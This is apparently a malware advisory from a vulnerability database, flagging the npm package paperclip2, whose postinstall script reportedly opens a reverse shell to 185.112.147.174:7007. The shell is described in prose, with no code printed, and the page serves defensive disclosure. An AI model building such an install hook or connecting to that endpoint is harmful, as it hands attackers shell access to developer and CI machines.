VDB
KO

MAL-2026-6755

Malicious code in paperclip2 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b6fbcfc445b1a599943dac3ca0691633629c6804037b38fcf6113062f6add848) package.json declares a postinstall lifecycle script that runs `node -e` code opening a TCP connection to 185.112.147.174:7007 and piping the socket to a spawned /bin/sh, giving the operator of that endpoint an interactive shell on the installer's machine. The package ships no other functionality — its sole effect on install is to establish this reverse shell. Any developer workstation or CI job running `npm install paperclip2` is compromised with arbitrary code execution as the invoking user.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / paperclip2

No fixed version published yet for paperclip2 (npm). Pin to a known-safe version or switch to an alternative.

References